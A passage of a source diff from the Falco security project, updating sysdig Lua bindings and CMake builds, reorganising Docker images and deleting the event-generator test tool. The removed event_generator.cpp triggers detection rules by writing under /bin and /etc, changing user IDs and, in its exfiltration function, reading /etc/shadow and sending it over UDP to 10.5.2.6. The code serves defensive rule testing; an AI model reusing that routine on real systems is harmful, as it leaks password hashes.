+ 	{"set_filter", &lua_cbacks::set_global_filter},
+ 	{"set_snaplen", &lua_cbacks::set_snaplen},
+@@ -134,7 +134,7 @@ const static struct luaL_reg ll_sysdig [] =
+ 	{NULL,NULL}
+ };
+ 
+-const static struct luaL_reg ll_chisel [] =
+const static struct luaL_Reg ll_chisel [] =
+ {
+ 	{"request_field", &lua_cbacks::request_field},
+ 	{"set_filter", &lua_cbacks::set_filter},
+@@ -146,7 +146,7 @@ const static struct luaL_reg ll_chisel [] =
+ 	{NULL,NULL}
+ };
+ 
+-const static struct luaL_reg ll_evt [] =
+const static struct luaL_Reg ll_evt [] =
+ {
+ 	{"field", &lua_cbacks::field},
+ 	{"get_num", &lua_cbacks::get_num},
+diff --git a/userspace/libsinsp/lua_parser.cpp b/userspace/libsinsp/lua_parser.cpp
+index 0e26617d..78810d96 100644
+--- a/userspace/libsinsp/lua_parser.cpp
+++ b/userspace/libsinsp/lua_parser.cpp
+@@ -32,7 +32,7 @@ extern "C" {
+ #include "lauxlib.h"
+ }
+ 
+-const static struct luaL_reg ll_filter [] =
+const static struct luaL_Reg ll_filter [] =
+ {
+ 	{"rel_expr", &lua_parser_cbacks::rel_expr},
+ 	{"bool_op", &lua_parser_cbacks::bool_op},
+diff --git a/userspace/libsinsp/lua_parser_api.cpp b/userspace/libsinsp/lua_parser_api.cpp
+index c89e9126..c3d8008a 100644
+--- a/userspace/libsinsp/lua_parser_api.cpp
+++ b/userspace/libsinsp/lua_parser_api.cpp
+@@ -266,7 +266,7 @@ int lua_parser_cbacks::rel_expr(lua_State *ls)
+ 					string err = "Got non-table as in-expression operand\n";
+ 					throw sinsp_exception("parser API error");
+ 				}
+-				int n = luaL_getn(ls, 4);  /* get size of table */
+				int n = lua_objlen (ls, 4);  /* get size of table */
+ 				for (i=1; i<=n; i++)
+ 				{
+ 					lua_rawgeti(ls, 4, i);
--- a/cmake/modules/sysdig.cmake
+++ b/cmake/modules/sysdig.cmake
@@ -1,5 +1,5 @@
 #
-# Copyright (C) 2019 The Falco Authors.
+# Copyright (C) 2020 The Falco Authors.
 #
 # Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
 # the License. You may obtain a copy of the License at
@@ -16,24 +16,27 @@ set(SYSDIG_CMAKE_WORKING_DIR "${CMAKE_BINARY_DIR}/sysdig-repo")

 # this needs to be here at the top
 if(USE_BUNDLED_DEPS)
-  # explicitly force this dependency to use the system OpenSSL
-  set(USE_BUNDLED_OPENSSL ON)
+  # explicitly force this dependency to use the bundled OpenSSL
+  if(NOT MINIMAL_BUILD)
+    set(USE_BUNDLED_OPENSSL ON)
+  endif()
+  set(USE_BUNDLED_JQ ON)
 endif()

 file(MAKE_DIRECTORY ${SYSDIG_CMAKE_WORKING_DIR})

-# The sysdig git reference (branch name, commit hash, or tag)
-# To update sysdig version for the next release, change the default below
-# In case you want to test against another sysdig version just pass the variable - ie., `cmake -DSYSDIG_VERSION=dev ..`
+# The sysdig git reference (branch name, commit hash, or tag) To update sysdig version for the next release, change the
+# default below In case you want to test against another sysdig version just pass the variable - ie., `cmake
+# -DSYSDIG_VERSION=dev ..`
 if(NOT SYSDIG_VERSION)
-  set(SYSDIG_VERSION "a259b4bf49c3330d9ad6c3eed9eb1a31954259a6")
-  set(SYSDIG_CHECKSUM "SHA256=fdbeb8d182e6383fe89428e0934d521636068f62109c1b3ca11689d886458284")
+  set(SYSDIG_VERSION "5c0b863ddade7a45568c0ac97d037422c9efb750")
+  set(SYSDIG_CHECKSUM "SHA256=9de717b3a4b611ea6df56afee05171860167112f74bb7717b394bcc88ac843cd")
 endif()
 set(PROBE_VERSION "${SYSDIG_VERSION}")

 # cd /path/to/build && cmake /path/to/source
-execute_process(COMMAND "${CMAKE_COMMAND}" -DSYSDIG_VERSION=${SYSDIG_VERSION} -DSYSDIG_CHECKSUM=${SYSDIG_CHECKSUM} ${SYSDIG_CMAKE_SOURCE_DIR} WORKING_DIRECTORY ${SYSDIG_CMAKE_WORKING_DIR})
-
+execute_process(COMMAND "${CMAKE_COMMAND}" -DSYSDIG_VERSION=${SYSDIG_VERSION} -DSYSDIG_CHECKSUM=${SYSDIG_CHECKSUM}
+                        ${SYSDIG_CMAKE_SOURCE_DIR} WORKING_DIRECTORY ${SYSDIG_CMAKE_WORKING_DIR})

 # todo(leodido, fntlnz) > use the following one when CMake version will be >= 3.13

@@ -54,6 +57,10 @@ add_subdirectory("${SYSDIG_SOURCE_DIR}/driver" "${PROJECT_BINARY_DIR}/driver")
 # Add libscap directory
 add_definitions(-D_GNU_SOURCE)
 add_definitions(-DHAS_CAPTURE)
+add_definitions(-DNOCURSESUI)
+if(MUSL_OPTIMIZED_BUILD)
+  add_definitions(-DMUSL_OPTIMIZED)
+endif()
 add_subdirectory("${SYSDIG_SOURCE_DIR}/userspace/libscap" "${PROJECT_BINARY_DIR}/userspace/libscap")

 # Add libsinsp directory
@@ -64,5 +71,8 @@ add_dependencies(sinsp tbb b64 luajit)
 set(CREATE_TEST_TARGETS OFF)

 if(USE_BUNDLED_DEPS)
-  add_dependencies(scap grpc curl jq)
+  add_dependencies(scap jq)
+  if(NOT MINIMAL_BUILD)
+    add_dependencies(scap curl grpc)
+  endif()
 endif()
--- a/cmake/modules/yaml-cpp.cmake
+++ b/cmake/modules/yaml-cpp.cmake
@@ -1,5 +1,5 @@
 #
-# Copyright (C) 2019 The Falco Authors.
+# Copyright (C) 2020 The Falco Authors.
 #
 # Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
 # the License. You may obtain a copy of the License at
@@ -10,6 +10,7 @@
 # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
 # specific language governing permissions and limitations under the License.
 #
+mark_as_advanced(YAMLCPP_INCLUDE_DIR YAMLCPP_LIB)
 if(NOT USE_BUNDLED_DEPS)
  find_path(YAMLCPP_INCLUDE_DIR NAMES yaml-cpp/yaml.h)
  find_library(YAMLCPP_LIB NAMES yaml-cpp)
--- a/docker/OWNERS
+++ b/docker/OWNERS
@@ -1,2 +1,6 @@
 labels:
-  - area/integration
+  - area/integration
+approvers:
+  - leogr
+reviewers:
+  - leogr
--- a/docker/README.md
+++ b/docker/README.md
@@ -1,15 +1,14 @@
 # Falco Dockerfiles

-This directory contains the various ways to package Falco as a container. 
+This directory contains various ways to package Falco as a container and related tools. 

 ## Currently Supported Images

 | Name | Directory | Description |
 |---|---|---|
-| [falcosecurity/falco:latest](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:_tag_](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:master](https://hub.docker.com/repository/docker/falcosecurity/falco) | docker/stable | Falco (DEB built from git tag or from the master) with all the building toolchain. | 
-| [falcosecurity/falco:latest-slim](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:master-slim](https://hub.docker.com/repository/docker/falcosecurity/falco) | docker/slim | Falco (DEB build from git tag or from the master) without the building toolchain. | 
-| [falcosecurity/falco:latest-minimal](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:master-minimal](https://hub.docker.com/repository/docker/falcosecurity/falco) | docker/minimal | Falco (TGZ built from git tag or from the master) without the building toolchain. | 
-| [falcosecurity/falco-event-generator:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-event-generator) | docker/event-generator | Event generator tool to simulate events Falco catches. | 
+| [falcosecurity/falco:latest](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:_tag_](https://hub.docker.com/repository/docker/falcosecurity/falco), [falcosecurity/falco:master](https://hub.docker.com/repository/docker/falcosecurity/falco) | docker/falco | Falco (DEB built from git tag or from the master) with all the building toolchain. | 
+| [falcosecurity/falco-driver-loader:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-driver-loader), [falcosecurity/falco-driver-loader:_tag_](https://hub.docker.com/repository/docker/falcosecurity/falco-driver-loader), [falcosecurity/falco-driver-loader:master](https://hub.docker.com/repository/docker/falcosecurity/falco-driver-loader) | docker/driver-loader | `falco-driver-loader` as entrypoint with the building toolchain. | 
+| [falcosecurity/falco-no-driver:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-no-driver), [falcosecurity/falco-no-driver:_tag_](https://hub.docker.com/repository/docker/falcosecurity/falco-no-driver),[falcosecurity/falco-no-driver:master](https://hub.docker.com/repository/docker/falcosecurity/falco-no-driver) | docker/no-driver | Falco (TGZ built from git tag or from the master) without the building toolchain. | 
 | [falcosecurity/falco-builder:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-builder) | docker/builder | The complete build tool chain for compiling Falco from source. See [the documentation](https://falco.org/docs/source/) for more details on building from source. Used to build Falco (CI). | 
 | [falcosecurity/falco-tester:latest](https://hub.docker.com/repository/docker/falcosecurity/falco-tester) | docker/tester | Container image for running the Falco test suite. Used to run Falco integration tests (CI). | 
 | _to not be published_ | docker/local | Built on-the-fly and used by falco-tester. |
--- a/docker/builder/root/usr/bin/entrypoint
+++ b/docker/builder/root/usr/bin/entrypoint
@@ -34,6 +34,7 @@ case "$CMD" in
    -DCMAKE_BUILD_TYPE="$BUILD_TYPE" \
    -DCMAKE_INSTALL_PREFIX=/usr \
    -DBUILD_DRIVER="$BUILD_DRIVER" \
+    -DMINIMAL_BUILD="$MINIMAL_BUILD" \
    -DBUILD_BPF="$BUILD_BPF" \
    -DBUILD_WARNINGS_AS_ERRORS="$BUILD_WARNINGS_AS_ERRORS" \
    -DFALCO_VERSION="$FALCO_VERSION" \
--- a/docker/driver-loader/Dockerfile
+++ b/docker/driver-loader/Dockerfile
@@ -0,0 +1,13 @@
+ARG FALCO_IMAGE_TAG=latest
+FROM falcosecurity/falco:${FALCO_IMAGE_TAG}
+
+LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+
+LABEL usage="docker run -i -t --privileged -v /root/.falco:/root/.falco -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro -v /etc:/host/etc:ro --name NAME IMAGE"
+
+ENV HOST_ROOT /host
+ENV HOME /root
+
+COPY ./docker-entrypoint.sh /
+
+ENTRYPOINT ["/docker-entrypoint.sh"]
--- a/docker/driver-loader/docker-entrypoint.sh
+++ b/docker/driver-loader/docker-entrypoint.sh
@@ -0,0 +1,28 @@
+#!/usr/bin/env bash
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+
+echo "* Setting up /usr/src links from host"
+
+for i in "$HOST_ROOT/usr/src"/*
+do
+    base=$(basename "$i")
+    ln -s "$i" "/usr/src/$base"
+done
+
+/usr/bin/falco-driver-loader "$@"
--- a/docker/event-generator/Dockerfile
+++ b/docker/event-generator/Dockerfile
@@ -1,10 +0,0 @@
-FROM alpine:latest
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
-RUN apk add --no-cache bash g++ curl
-COPY ./event_generator.cpp /usr/local/bin
-COPY ./docker-entrypoint.sh ./k8s_event_generator.sh /
-COPY ./yaml /yaml
-RUN mkdir -p /var/lib/rpm
-RUN g++ --std=c++0x /usr/local/bin/event_generator.cpp -o /usr/local/bin/event_generator
-RUN curl -o /usr/local/bin/kubectl -LO https://storage.googleapis.com/kubernetes-release/release/`curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt`/bin/linux/amd64/kubectl && chmod +x /usr/local/bin/kubectl
-ENTRYPOINT ["/docker-entrypoint.sh"]
--- a/docker/event-generator/docker-entrypoint.sh
+++ b/docker/event-generator/docker-entrypoint.sh
@@ -1,21 +0,0 @@
-#!/bin/bash
-
-CMD=${1:-syscall}
-
-shift
-
-set -euo pipefail
-
-if [[ "$CMD" == "syscall" ]]; then
-    /usr/local/bin/event_generator
-elif [[ "$CMD" == "k8s_audit" ]]; then
-    . k8s_event_generator.sh
-elif [[ "$CMD" == "bash" ]]; then
-    bash
-else
-    echo "Unknown command. Can be one of"
-    echo "   \"syscall\": generate falco syscall-related activity"
-    echo "   \"k8s_audit\": generate falco k8s audit-related activity"
-    echo "   \"bash\": spawn a shell"
-    exit 1
-fi
--- a/docker/event-generator/event-generator-k8saudit-deployment.yaml
+++ b/docker/event-generator/event-generator-k8saudit-deployment.yaml
@@ -1,23 +0,0 @@
-apiVersion: apps/v1
-kind: Deployment
-metadata:
-  name: falco-event-generator-k8saudit
-  labels:
-    app: falco-event-generator-k8saudit
-  namespace: falco-event-generator
-spec:
-  replicas: 1
-  selector:
-    matchLabels:
-      app: falco-event-generator-k8saudit
-  template:
-    metadata:
-      labels:
-        app: falco-event-generator-k8saudit
-    spec:
-      serviceAccount: falco-event-generator
-      containers:
-      - name: falco-event-generator
-        image: falcosecurity/falco-event-generator
-        imagePullPolicy: Always
-        args: ["k8s_audit"]
--- a/docker/event-generator/event-generator-role-rolebinding-serviceaccount.yaml
+++ b/docker/event-generator/event-generator-role-rolebinding-serviceaccount.yaml
@@ -1,71 +0,0 @@
-apiVersion: rbac.authorization.k8s.io/v1
-kind: ClusterRole
-metadata:
-  name: falco-event-generator
-rules:
- apiGroups:
-  - ""
-  resources:
-  - configmaps
-  - services
-  - serviceaccounts
-  - pods
-  verbs:
-  - list
-  - get
-  - create
-  - delete
- apiGroups:
-  - apps
-  - extensions
-  resources:
-  - deployments
-  verbs:
-  - list
-  - get
-  - create
-  - delete
- apiGroups:
-  - rbac.authorization.k8s.io
-  resources:
-  - roles
-  - rolebindings
-  verbs:
-  - get
-  - list
-  - create
-  - delete
-# These are only so the event generator can create roles that have these properties.
-# It will result in a falco alert for the rules "ClusterRole With Wildcard Created", "ClusterRole With Pod Exec Created"
- apiGroups:
-  - ""
-  resources:
-  - pods/exec
-  verbs:
-  - get
- apiGroups:
-  - ""
-  resources:
-  - '*'
-  verbs:
-  - get
---
-apiVersion: rbac.authorization.k8s.io/v1
-kind: RoleBinding
-metadata:
-  name: falco-event-generator
-  namespace: falco-eg-sandbox
-subjects:
-  - kind: ServiceAccount
-    name: falco-event-generator
-    namespace: falco-event-generator
-roleRef:
-  kind: ClusterRole
-  name: falco-event-generator
-  apiGroup: rbac.authorization.k8s.io
---
-apiVersion: v1
-kind: ServiceAccount
-metadata:
-  name: falco-event-generator
-  namespace: falco-event-generator
--- a/docker/event-generator/event-generator-syscall-daemonset.yaml
+++ b/docker/event-generator/event-generator-syscall-daemonset.yaml
@@ -1,20 +0,0 @@
-apiVersion: apps/v1
-kind: DaemonSet
-metadata:
-  name: falco-event-generator-syscall
-  labels:
-    app: falco-event-generator-syscall
-  namespace: falco-event-generator
-spec:
-  selector:
-    matchLabels:
-      name: falco-event-generator-syscall
-  template:
-    metadata:
-      labels:
-        name: falco-event-generator-syscall
-    spec:
-      containers:
-      - name: falco-event-generator
-        image: falcosecurity/falco-event-generator
-        args: ["syscall"]
--- a/docker/event-generator/event_generator.cpp
+++ b/docker/event-generator/event_generator.cpp
@@ -1,535 +0,0 @@
-/*
-Copyright (C) 2019 The Falco Authors.
-
-Licensed under the Apache License, Version 2.0 (the "License");
-you may not use this file except in compliance with the License.
-You may obtain a copy of the License at
-
-    http://www.apache.org/licenses/LICENSE-2.0
-
-Unless required by applicable law or agreed to in writing, software
-distributed under the License is distributed on an "AS IS" BASIS,
-WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-See the License for the specific language governing permissions and
-limitations under the License.
-*/
-
-#include <cstdio>
-#include <utility>
-#include <map>
-#include <set>
-#include <string>
-#include <fstream>
-#include <sstream>
-#include <cstring>
-#include <cstdlib>
-#include <unistd.h>
-#include <getopt.h>
-#include <errno.h>
-#include <sys/types.h>
-#include <sys/stat.h>
-#include <sys/wait.h>
-#include <pwd.h>
-#include <sys/socket.h>
-#include <arpa/inet.h>
-
-using namespace std;
-
-void usage(char *program)
-{
-	printf("Usage %s [options]\n\n", program);
-	printf("Options:\n");
-	printf("     -h/--help: show this help\n");
-	printf("     -a/--action: actions to perform. Can be one of the following:\n");
-	printf("          write_binary_dir                           Write to files below /bin\n");
-	printf("          write_etc                                  Write to files below /etc\n");
-	printf("          read_sensitive_file                        Read a sensitive file\n");
-	printf("          read_sensitive_file_after_startup          As a trusted program, wait a while,\n");
-	printf("                                                     then read a sensitive file\n");
-	printf("          write_rpm_database                         Write to files below /var/lib/rpm\n");
-	printf("          spawn_shell                                Run a shell (bash)\n");
-	printf("                                                     Used by spawn_shell_under_httpd below\n");
-	printf("          spawn_shell_under_httpd                    Run a shell (bash) under a httpd process\n");
-	printf("          db_program_spawn_process                   As a database program, try to spawn\n");
-	printf("                                                     another program\n");
-	printf("          modify_binary_dirs                         Modify a file below /bin\n");
-	printf("          mkdir_binary_dirs                          Create a directory below /bin\n");
-	printf("          change_thread_namespace                    Change namespace\n");
-	printf("          system_user_interactive                    Change to a system user and try to\n");
-	printf("                                                     run an interactive command\n");
-	printf("          network_activity                           Open network connections\n");
-	printf("                                                     (used by system_procs_network_activity below)\n");
-	printf("          system_procs_network_activity              Open network connections as a program\n");
-	printf("                                                     that should not perform network actions\n");
-	printf("          non_sudo_setuid                            Setuid as a non-root user\n");
-	printf("          create_files_below_dev                     Create files below /dev\n");
-	printf("          exec_ls                                    execve() the program ls\n");
-	printf("                                                     (used by user_mgmt_binaries, db_program_spawn_process)\n");
-	printf("          user_mgmt_binaries                         Become the program \"vipw\", which triggers\n");
-	printf("                                                     rules related to user management programs\n");
-	printf("          exfiltration                               Read /etc/shadow and send it via udp to a\n");
-	printf("                                                     specific address and port\n");
-	printf("          all                                        All of the above\n");
-	printf("       The action can also be specified via the environment variable EVENT_GENERATOR_ACTIONS\n");
-	printf("           as a colon-separated list\n");
-	printf("       if specified, -a/--action overrides any environment variables\n");
-	printf("     -i/--interval: Number of seconds between actions\n");
-	printf("     -o/--once: Perform actions once and exit\n");
-}
-
-void open_file(const char *filename, const char *flags)
-{
-	FILE *f = fopen(filename, flags);
-	if(f)
-	{
-		fclose(f);
-	}
-	else
-	{
-		fprintf(stderr, "Could not open %s for writing: %s\n", filename, strerror(errno));
-	}
-}
-
-void exfiltration()
-{
-	ifstream shadow;
-
-	shadow.open("/etc/shadow");
-
-	printf("Reading /etc/shadow and sending to 10.5.2.6:8197...\n");
-
-	if(!shadow.is_open())
-	{
-		fprintf(stderr, "Could not open /etc/shadow for reading: %s", strerror(errno));
-		return;
-	}
-
-	string line;
-	string shadow_contents;
-	while(getline(shadow, line))
-	{
-		shadow_contents += line;
-		shadow_contents += "\n";
-	}
-
-	int rc;
-	ssize_t sent;
-	int sock = socket(PF_INET, SOCK_DGRAM, 0);
-	struct sockaddr_in dest;
-
-	dest.sin_family = AF_INET;
-	dest.sin_port = htons(8197);
-	inet_aton("10.5.2.6", &(dest.sin_addr));
-
-	if((rc = connect(sock, (struct sockaddr *)&dest, sizeof(dest))) != 0)
-	{
-		fprintf(stderr, "Could not bind listening socket to dest: %s\n", strerror(errno));
-		return;
-	}
-
-	if((sent = send(sock, shadow_contents.c_str(), shadow_contents.size(), 0)) != shadow_contents.size())
-	{
-		fprintf(stderr, "Could not send shadow contents via udp datagram: %s\n", strerror(errno));
-		return;
-	}
-
-	close(sock);
-}
-
-void touch(const char *filename)
-{
-	open_file(filename, "w");
-}
-
-void read(const char *filename)
-{
-	open_file(filename, "r");
-}
-
-void become_user(const char *user)
-{
-	struct passwd *pw;
-	pw = getpwnam(user);
-	if(pw == NULL)
-	{
-		fprintf(stderr, "Could not find user information for \"%s\" user: %s\n", user, strerror(errno));
-		exit(1);
-	}
-
-	int rc = setuid(pw->pw_uid);
-
-	if(rc != 0)
-	{
-		fprintf(stderr, "Could not change user to \"%s\" (uid %u): %s\n", user, pw->pw_uid, strerror(errno));
-		exit(1);
-	}
-}
-
-void spawn(const char *cmd, char **argv, char **env)
-{
-	pid_t child;
-
-	// Fork a process, that way proc.duration is reset
-	if((child = fork()) == 0)
-	{
-		execve(cmd, argv, env);
-		fprintf(stderr, "Could not exec to spawn %s: %s\n", cmd, strerror(errno));
-	}
-	else
-	{
-		int status;
-		waitpid(child, &status, 0);
-	}
-}
-
-void respawn(const char *cmd, const char *action, const char *interval)
-{
-	char *argv[] = {(char *)cmd,
-			(char *)"--action", (char *)action,
-			(char *)"--interval", (char *)interval,
-			(char *)"--once", NULL};
-
-	char *env[] = {NULL};
-
-	spawn(cmd, argv, env);
-}
-
-void write_binary_dir()
-{
-	printf("Writing to /bin/created-by-event-generator-sh...\n");
-	touch("/bin/created-by-event-generator-sh");
-}
-
-void write_etc()
-{
-	printf("Writing to /etc/created-by-event-generator-sh...\n");
-	touch("/etc/created-by-event-generator-sh");
-}
-
-void read_sensitive_file()
-{
-	printf("Reading /etc/shadow...\n");
-	read("/etc/shadow");
-}
-
-void read_sensitive_file_after_startup()
-{
-	printf("Becoming the program \"httpd\", sleeping 6 seconds and reading /etc/shadow...\n");
-	respawn("./httpd", "read_sensitive_file", "6");
-}
-
-void write_rpm_database()
-{
-	printf("Writing to /var/lib/rpm/created-by-event-generator-sh...\n");
-	touch("/var/lib/rpm/created-by-event-generator-sh");
-}
-
-void spawn_shell()
-{
-	printf("Spawning a shell to run \"ls > /dev/null\" using system()...\n");
-	int rc;
-
-	if((rc = system("ls > /dev/null")) != 0)
-	{
-		fprintf(stderr, "Could not run ls > /dev/null in a shell: %s\n", strerror(errno));
-	}
-}
-
-void spawn_shell_under_httpd()
-{
-	printf("Becoming the program \"httpd\" and then spawning a shell\n");
-	respawn("./httpd", "spawn_shell", "0");
-}
-
-void db_program_spawn_process()
-{
-	printf("Becoming the program \"mysql\" and then running ls\n");
-	respawn("./mysqld", "exec_ls", "0");
-}
-
-void modify_binary_dirs()
-{
-	printf("Moving /bin/true to /bin/true.event-generator-sh and back...\n");
-
-	if(rename("/bin/true", "/bin/true.event-generator-sh") != 0)
-	{
-		fprintf(stderr, "Could not rename \"/bin/true\" to \"/bin/true.event-generator-sh\": %s\n", strerror(errno));
-	}
-	else
-	{
-		if(rename("/bin/true.event-generator-sh", "/bin/true") != 0)
-		{
-			fprintf(stderr, "Could not rename \"/bin/true.event-generator-sh\" to \"/bin/true\": %s\n", strerror(errno));
-		}
-	}
-}
-
-void mkdir_binary_dirs()
-{
-	printf("Creating directory /bin/directory-created-by-event-generator-sh...\n");
-	if(mkdir("/bin/directory-created-by-event-generator-sh", 0644) != 0)
-	{
-		fprintf(stderr, "Could not create directory \"/bin/directory-created-by-event-generator-sh\": %s\n", strerror(errno));
-	}
-}
-
-void change_thread_namespace()
-{
-	printf("Calling setns() to change namespaces...\n");
-	printf("NOTE: does not result in a falco notification in containers, unless container run with --privileged or --security-opt seccomp=unconfined\n");
-	// It doesn't matter that the arguments to setns are
-	// bogus. It's the attempt to call it that will trigger the
-	// rule.
-	setns(0, 0);
-}
-
-void system_user_interactive()
-{
-	pid_t child;
-
-	printf("Forking a child that becomes user=daemon and then tries to run /bin/login...\n");
-	// Fork a child and do everything in the child.
-	if((child = fork()) == 0)
-	{
-		become_user("daemon");
-		char *argv[] = {(char *)"/bin/login", NULL};
-		char *env[] = {NULL};
-		spawn("/bin/login", argv, env);
-		exit(0);
-	}
-	else
-	{
-		int status;
-		waitpid(child, &status, 0);
-	}
-}
-
-void network_activity()
-{
-	printf("Connecting a udp socket to 10.2.3.4:8192...\n");
-	int rc;
-	int sock = socket(PF_INET, SOCK_DGRAM, 0);
-	struct sockaddr_in localhost;
-
-	localhost.sin_family = AF_INET;
-	localhost.sin_port = htons(8192);
-	inet_aton("10.2.3.4", &(localhost.sin_addr));
-
-	if((rc = connect(sock, (struct sockaddr *)&localhost, sizeof(localhost))) != 0)
-	{
-		fprintf(stderr, "Could not bind listening socket to localhost: %s\n", strerror(errno));
-		return;
-	}
-
-	close(sock);
-}
-
-void system_procs_network_activity()
-{
-	printf("Becoming the program \"sha1sum\" and then performing network activity\n");
-	respawn("./sha1sum", "network_activity", "0");
-}
-
-void non_sudo_setuid()
-{
-	pid_t child;
-
-	printf("Forking a child that becomes \"daemon\" user and then \"root\"...\n");
-
-	// Fork a child and do everything in the child.
-	if((child = fork()) == 0)
-	{
-		// First setuid to something non-root. Then try to setuid back to root.
-		become_user("daemon");
-		become_user("root");
-		exit(0);
-	}
-	else
-	{
-		int status;
-		waitpid(child, &status, 0);
-	}
-}
-
-void create_files_below_dev()
-{
-	printf("Creating /dev/created-by-event-generator-sh...\n");
-	touch("/dev/created-by-event-generator-sh");
-}
-
-void exec_ls()
-{
-	char *argv[] = {(char *)"/bin/ls", NULL};
-	char *env[] = {NULL};
-	spawn("/bin/ls", argv, env);
-}
-
-void user_mgmt_binaries()
-{
-	printf("Becoming the program \"vipw\" and then running the program /bin/ls\n");
-	printf("NOTE: does not result in a falco notification in containers\n");
-	respawn("./vipw", "exec_ls", "0");
-}
-
-typedef void (*action_t)();
-
-map<string, action_t> defined_actions = {{"write_binary_dir", write_binary_dir},
-					 {"write_etc", write_etc},
-					 {"read_sensitive_file", read_sensitive_file},
-					 {"read_sensitive_file_after_startup", read_sensitive_file_after_startup},
-					 {"write_rpm_database", write_rpm_database},
-					 {"spawn_shell", spawn_shell},
-					 {"spawn_shell_under_httpd", spawn_shell_under_httpd},
-					 {"db_program_spawn_process", db_program_spawn_process},
-					 {"modify_binary_dirs", modify_binary_dirs},
-					 {"mkdir_binary_dirs", mkdir_binary_dirs},
-					 {"change_thread_namespace", change_thread_namespace},
-					 {"system_user_interactive", system_user_interactive},
-					 {"network_activity", network_activity},
-					 {"system_procs_network_activity", system_procs_network_activity},
-					 {"non_sudo_setuid", non_sudo_setuid},
-					 {"create_files_below_dev", create_files_below_dev},
-					 {"exec_ls", exec_ls},
-					 {"user_mgmt_binaries", user_mgmt_binaries},
-					 {"exfiltration", exfiltration}};
-
-// Some actions don't directly result in suspicious behavior. These
-// actions are excluded from the ones run with -a all.
-set<string> exclude_from_all_actions = {"spawn_shell", "exec_ls", "network_activity"};
-
-void create_symlinks(const char *program)
-{
-	int rc;
-
-	// Some actions depend on this program being re-run as
-	// different program names like 'mysqld', 'httpd', etc. This
-	// sets up all the required symlinks.
-	const char *progs[] = {"./httpd", "./mysqld", "./sha1sum", "./vipw", NULL};
-
-	for(unsigned int i = 0; progs[i] != NULL; i++)
-	{
-		unlink(progs[i]);
-
-		if((rc = symlink(program, progs[i])) != 0)
-		{
-			fprintf(stderr, "Could not link \"./event_generator\" to \"%s\": %s\n", progs[i], strerror(errno));
-		}
-	}
-}
-
-void run_actions(map<string, action_t> &actions, int interval, bool once)
-{
-	while(true)
-	{
-		for(auto action : actions)
-		{
-			printf("***Action %s\n", action.first.c_str());
-			action.second();
-			sleep(interval);
-		}
-		if(once)
-		{
-			break;
-		}
-	}
-}
-
-int main(int argc, char **argv)
-{
-	map<string, action_t> actions;
-	int op;
-	int long_index = 0;
-	int interval = 1;
-	bool once = false;
-	map<string, action_t>::iterator it;
-
-	static struct option long_options[] =
-		{
-			{"help", no_argument, 0, 'h'},
-			{"action", required_argument, 0, 'a'},
-			{"interval", required_argument, 0, 'i'},
-			{"once", no_argument, 0, 'o'},
-
-			{0, 0}};
-
-	//
-	// Parse the args
-	//
-	while((op = getopt_long(argc, argv,
-				"ha:i:l:o",
-				long_options, &long_index)) != -1)
-	{
-		switch(op)
-		{
-		case 'h':
-			usage(argv[0]);
-			exit(1);
-		case 'a':
-			// "all" is already implied
-			if(strcmp(optarg, "all") != 0)
-			{
-				if((it = defined_actions.find(optarg)) == defined_actions.end())
-				{
-					fprintf(stderr, "No action with name \"%s\" known, exiting.\n", optarg);
-					exit(1);
-				}
-				actions.insert(*it);
-			}
-			break;
-		case 'i':
-			interval = atoi(optarg);
-			break;
-		case 'o':
-			once = true;
-			break;
-		default:
-			usage(argv[0]);
-			exit(1);
-		}
-	}
-
-	//
-	// Also look for actions in the environment. If specified, they
-	// override any specified on the command line.
-	//
-	char *env_action = getenv("EVENT_GENERATOR_ACTIONS");
-
-	if(env_action)
-	{
-		actions.clear();
-
-		string envs(env_action);
-		istringstream ss(envs);
-		string item;
-		while(std::getline(ss, item, ':'))
-		{
-			if((it = defined_actions.find(item)) == defined_actions.end())
-			{
-				fprintf(stderr, "No action with name \"%s\" known, exiting.\n", item.c_str());
-				exit(1);
-			}
-			actions.insert(*it);
-		}
-	}
-
-	if(actions.size() == 0)
-	{
-		for(auto &act : defined_actions)
-		{
-			if(exclude_from_all_actions.find(act.first) == exclude_from_all_actions.end())
-			{
-				actions.insert(act);
-			}
-		}
-	}
-
-	setvbuf(stdout, NULL, _IONBF, 0);
-	setvbuf(stderr, NULL, _IONBF, 0);
-	// Only create symlinks when running as the program event_generator
-	if(strstr(argv[0], "generator"))
-	{
-		create_symlinks(argv[0]);
-	}
-
-	run_actions(actions, interval, once);
-}
--- a/docker/event-generator/k8s_event_generator.sh
+++ b/docker/event-generator/k8s_event_generator.sh
@@ -1,60 +0,0 @@
-#!/bin/bash
-
-set -euo pipefail
-
-# You can pass a specific falco rule name and only yaml files matching
-# that rule will be considered. The default is "all", meaning all yaml
-# files will be applied.
-
-RULE=${1:-all}
-
-# Replace any '/' in RULES with a '.' and any space with a dash. (K8s
-# label values can not contain slashes/spaces)
-RULE=$(echo "$RULE" | tr '/ ' '.-')
-
-echo "***Testing kubectl configuration..."
-kubectl version --short
-
-while true; do
-
-    # Delete all resources in the falco-eg-sandbox namespace
